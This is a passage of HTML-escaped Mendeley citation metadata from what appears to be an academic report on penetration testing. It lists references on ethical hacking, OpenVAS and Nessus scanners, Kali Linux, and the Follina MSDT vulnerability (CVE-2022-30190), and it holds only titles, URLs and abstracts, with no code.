GUIDE&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Baloch&quot;,&quot;given&quot;:&quot;Rafay&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;411f121a-a675-3ac1-b170-45304ce6e070&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;411f121a-a675-3ac1-b170-45304ce6e070&quot;,&quot;title&quot;:&quot;What is the CIA Triad? Definition, Explanation and Examples&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,21]]},&quot;URL&quot;:&quot;https://www.techtarget.com/whatis/definition/Confidentiality-integrity-and-availability-CIA&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_462965f5-7dc2-4c76-bb88-7004ac0c7e8a&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[13], [14], [17]–[20]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;80f36355-b927-383c-b156-2a8f48028563&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;80f36355-b927-383c-b156-2a8f48028563&quot;,&quot;title&quot;:&quot;RedTeam Security Threat Prevention Experts&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;RedTeam Security&quot;,&quot;given&quot;:&quot;&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,10]]},&quot;URL&quot;:&quot;https://www.redteamsecure.com/blog/penetration-test-need&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;7e512bb7-201d-3015-b929-c332bc431d46&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;7e512bb7-201d-3015-b929-c332bc431d46&quot;,&quot;title&quot;:&quot;Quick Start Guide to Penetration Testing&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Rahalkar&quot;,&quot;given&quot;:&quot;S&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;issued&quot;:{&quot;date-parts&quot;:[[2019]]},&quot;publisher-place&quot;:&quot;Berkley&quot;,&quot;number-of-pages&quot;:&quot;44-71&quot;,&quot;publisher&quot;:&quot;Apress&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;23212f41-1261-3f5c-a34b-f55b86cdea1f&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;23212f41-1261-3f5c-a34b-f55b86cdea1f&quot;,&quot;title&quot;:&quot;ETHICAL HACKING AND PENETRATION TESTING GUIDE&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Baloch&quot;,&quot;given&quot;:&quot;Rafay&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;0a2dd6d3-b990-39f4-bea6-73ad8b6ea04b&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;0a2dd6d3-b990-39f4-bea6-73ad8b6ea04b&quot;,&quot;title&quot;:&quot;A Survey on Network Penetration Testing&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Jayasuryapal&quot;,&quot;given&quot;:&quot;G.&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Pranay&quot;,&quot;given&quot;:&quot;P. Meher&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Kaur&quot;,&quot;given&quot;:&quot;Harpreet&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Swati&quot;,&quot;given&quot;:&quot;&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;container-title&quot;:&quot;Proceedings of 2021 2nd International Conference on Intelligent Engineering and Management, ICIEM 2021&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2021,11,11]]},&quot;DOI&quot;:&quot;10.1109/ICIEM51511.2021.9445321&quot;,&quot;ISBN&quot;:&quot;9781665414500&quot;,&quot;issued&quot;:{&quot;date-parts&quot;:[[2021,4,28]]},&quot;page&quot;:&quot;373-378&quot;,&quot;abstract&quot;:&quot;Penetration on network is an important security measurements every company want to take into the consideration. Day-to-Day life as it is seen that cybercrimes are increasing due to lack of security practice. Penetration testing is an outstanding approach where pen tester evaluates the security of network and numerous applications by simulating attacks from attacker's view point.Additionally, penetration testing process follow certain rules and agreement that both the parties ( client and pen testing team). By this testing, the company's weakness will be detected like open servers and open ports etc. so we can take a countermeasure by doing penetration testing on the company. This paper contains some of the important terms and steps to do a strong penetration testing on organizations. Hence, this paper covered all the mechanisms including information gathering to the post exploitation.&quot;,&quot;publisher&quot;:&quot;Institute of Electrical and Electronics Engineers Inc.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;76bf7eee-b0ea-352f-b116-1e0888970729&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;76bf7eee-b0ea-352f-b116-1e0888970729&quot;,&quot;title&quot;:&quot;OWASP Penetration Testing: The Essential Guide - Codepedia&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,21]]},&quot;URL&quot;:&quot;https://codepedia.info/owasp-penetration-testing&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;0646c93e-1ed2-3589-be54-622048f34c14&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;0646c93e-1ed2-3589-be54-622048f34c14&quot;,&quot;title&quot;:&quot;The Penetration Testing Execution Standard&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,10]]},&quot;URL&quot;:&quot;http://www.pentest-standard.org/index.php/Main_Page&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_15570bc3-0217-42b4-a876-c51cc70a6eed&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[21]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;df4072e2-f547-3106-9124-13cd9ea99c7c&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;df4072e2-f547-3106-9124-13cd9ea99c7c&quot;,&quot;title&quot;:&quot;Oracle VM VirtualBox | Oracle Technology Network | Oracle&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,10]]},&quot;URL&quot;:&quot;https://www.oracle.com/virtualization/technologies/vm/virtualbox.html&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_e48a17e2-fc7b-4fe6-9aba-98352706f289&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;citeprocText&quot;:&quot;[22], [23]&quot;,&quot;isManuallyOverridden&quot;:false,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;6f914bf8-eb2c-594f-be5e-81944bd26189&quot;,&quot;itemData&quot;:{&quot;URL&quot;:&quot;https://www-proquest-com.ezproxy.uwtsd.ac.uk/docview/2394928471?pq-origsite=primo&amp;accountid=130472&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[&quot;2021&quot;,&quot;9&quot;,&quot;7&quot;]]},&quot;id&quot;:&quot;6f914bf8-eb2c-594f-be5e-81944bd26189&quot;,&quot;issued&quot;:{&quot;date-parts&quot;:[[&quot;0&quot;]]},&quot;title&quot;:&quot;Some ethical hacking possibilities in Kali Linux environment - ProQuest&quot;,&quot;type&quot;:&quot;webpage&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;uris&quot;:[&quot;http://www.mendeley.com/documents/?uuid=59e0a70a-3498-34ca-b6f7-16462e7eb29f&quot;],&quot;isTemporary&quot;:false,&quot;legacyDesktopId&quot;:&quot;59e0a70a-3498-34ca-b6f7-16462e7eb29f&quot;},{&quot;id&quot;:&quot;13f250b9-b5aa-3018-9d87-fc42816f68ee&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;13f250b9-b5aa-3018-9d87-fc42816f68ee&quot;,&quot;title&quot;:&quot;Some ethical hacking possibilities in Kali Linux environment - ProQuest&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,8,4]]},&quot;URL&quot;:&quot;https://www.proquest.com/docview/2394928471?accountid=130472&amp;parentSessionId=q8mlchcyUA37lc6kvXYE7w67bja9GdG43SQGzXvly5I%3D&amp;pq-origsite=primo&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_4f3ad271-7726-45a5-aa66-c99627fa7702&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[24]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;af6e8fe0-1427-3ac4-83f7-e01a2cae9799&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;af6e8fe0-1427-3ac4-83f7-e01a2cae9799&quot;,&quot;title&quot;:&quot;OpenVAS vs. Nessus - A Comprehensive Analysis | Intruder&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,9]]},&quot;URL&quot;:&quot;https://www.intruder.io/blog/openvas-vs-nessus&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_4b8a2871-414c-4dde-a40b-ef386b96bea0&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[18], [24]–[28]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;af6e8fe0-1427-3ac4-83f7-e01a2cae9799&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;af6e8fe0-1427-3ac4-83f7-e01a2cae9799&quot;,&quot;title&quot;:&quot;OpenVAS vs. Nessus - A Comprehensive Analysis | Intruder&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,9]]},&quot;URL&quot;:&quot;https://www.intruder.io/blog/openvas-vs-nessus&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;1d5c3194-4832-3026-8747-e9c2bebc0604&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;1d5c3194-4832-3026-8747-e9c2bebc0604&quot;,&quot;title&quot;:&quot;About Greenbone Community Feed (GCF) - Feed Services (GCF &amp; GSF) - Greenbone Community Portal&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,9]]},&quot;URL&quot;:&quot;https://community.greenbone.net/t/about-greenbone-community-feed-gcf/1224&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;9679602e-7b55-377d-b3ca-2a7463f15937&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;9679602e-7b55-377d-b3ca-2a7463f15937&quot;,&quot;title&quot;:&quot;A brief introduction to the OpenVAS vulnerability scanner - Infosec Resources&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,9]]},&quot;URL&quot;:&quot;https://resources.infosecinstitute.com/topic/a-brief-introduction-to-the-openvas-vulnerability-scanner/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;69cd7b15-0b7c-3bbb-a1a1-ad9421db9206&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;69cd7b15-0b7c-3bbb-a1a1-ad9421db9206&quot;,&quot;title&quot;:&quot;A First Look at the Usability of OpenVAS Vulnerability Scanner&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Altuncu&quot;,&quot;given&quot;:&quot;Enes&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Bicakci&quot;,&quot;given&quot;:&quot;Kemal&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Aksu&quot;,&quot;given&quot;:&quot;M Ugur&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,9]]},&quot;DOI&quot;:&quot;10.14722/usec.2019.23026&quot;,&quot;ISBN&quot;:&quot;1891562576&quot;,&quot;URL&quot;:&quot;https://dx.doi.org/10.14722/usec.2019.23026&quot;,&quot;abstract&quot;:&quot;Vulnerability scanning is a fundamental step for assuring system security. It is also an integral component of IT system risk assessment to manage the identified vulnerabilities in a timely and prioritized way. It is critical that the tools for vulnerability scanning are usable so that cybersecurity practitioners get the most out of them. In this work, we evaluate the usability of a commonly used open source vulnerability scanning tool − OpenVAS 9.0. For this purpose, we carry out expert-based and user-based testings. Expert-based testing is carried out by employing the heuristic analysis and cognitive walkthrough approaches. User-based testing is performed by selecting 10 cybersecurity experts as participants. As a result, we identify pitfalls that lead to insecurity or false sense of security and suggest improvements to overcome them. We also discuss the effectiveness of the methodologies employed for usability testing. Lastly, a set of heuristics compiled from the existing work and adapted to our case is provided to be reused in similar studies.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;7e512bb7-201d-3015-b929-c332bc431d46&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;7e512bb7-201d-3015-b929-c332bc431d46&quot;,&quot;title&quot;:&quot;Quick Start Guide to Penetration Testing&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Rahalkar&quot;,&quot;given&quot;:&quot;S&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;issued&quot;:{&quot;date-parts&quot;:[[2019]]},&quot;publisher-place&quot;:&quot;Berkley&quot;,&quot;number-of-pages&quot;:&quot;44-71&quot;,&quot;publisher&quot;:&quot;Apress&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;013d5665-5bf1-3970-9bf8-07bed1ca360f&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;013d5665-5bf1-3970-9bf8-07bed1ca360f&quot;,&quot;title&quot;:&quot;Background — Greenbone Community Documentation documentation&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,10]]},&quot;URL&quot;:&quot;https://greenbone.github.io/docs/latest/background.html#history-of-the-openvas-project&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_4d5c1356-9a8e-4aea-a065-4805765f7790&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[28]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;013d5665-5bf1-3970-9bf8-07bed1ca360f&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;013d5665-5bf1-3970-9bf8-07bed1ca360f&quot;,&quot;title&quot;:&quot;Background — Greenbone Community Documentation documentation&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,10]]},&quot;URL&quot;:&quot;https://greenbone.github.io/docs/latest/background.html#history-of-the-openvas-project&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_dfff48ff-831f-43dd-9bc0-4abcce888521&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[29]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f73eb5c6-e427-3fca-ad0b-6f5355624019&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;f73eb5c6-e427-3fca-ad0b-6f5355624019&quot;,&quot;title&quot;:&quot;An Analysis of the State of Electron Security in the Wild Declaration of Authorship&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Benjamin Altpeter&quot;,&quot;given&quot;:&quot;Thesis&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,9]]},&quot;issued&quot;:{&quot;date-parts&quot;:[[2020]]},&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_8bc7bde3-eb66-4294-8677-cb004c27f004&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[30]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;94cc862c-7be7-3d74-beeb-e7cbfc673318&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;94cc862c-7be7-3d74-beeb-e7cbfc673318&quot;,&quot;title&quot;:&quot;Follina — a Microsoft Office code execution vulnerability | by Kevin Beaumont | May, 2022 | DoublePulsar&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,9]]},&quot;URL&quot;:&quot;https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_5dff8fc3-47e6-49f1-b733-24795e2a9ff3&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[31]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;3884f688-6d88-38d0-b63d-34770ac25c04&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;3884f688-6d88-38d0-b63d-34770ac25c04&quot;,&quot;title&quot;:&quot;CVE-2022-30190 - Security Update Guide - Microsoft - Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,9]]},&quot;URL&quot;:&quot;https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_d4dd44de-f93a-45ee-8e08-8067690d5b94&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[32]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;title&quot;:&quot;Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,30]]},&quot;URL&quot;:&quot;https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_e0fb3410-ce19-4a9e-968d-7959154be055&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[32]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;title&quot;:&quot;Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,30]]},&quot;URL&quot;:&quot;https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_a1ec1b80-ecbd-442a-8d8c-565f8db6b18b&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[32]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;title&quot;:&quot;Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,30]]},&quot;URL&quot;:&quot;https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_026e4aa5-d05f-42d1-9b41-431497c67ae0&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[32]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;title&quot;:&quot;Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,30]]},&quot;URL&quot;:&quot;https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_4c887a28-213f-4780-b77b-262ff9286e2a&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[32]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;title&quot;:&quot;Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,30]]},&quot;URL&quot;:&quot;https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_2658ac8c-fc0b-4863-89a9-af9d2ab557c7&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[32]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;title&quot;:&quot;Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,30]]},&quot;URL&quot;:&quot;https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_201b3b8d-dd86-49be-aaaf-4bdfbed897dd&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[32]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;title&quot;:&quot;Rapid Response: Microsoft Office RCE - “Follina” MSDT 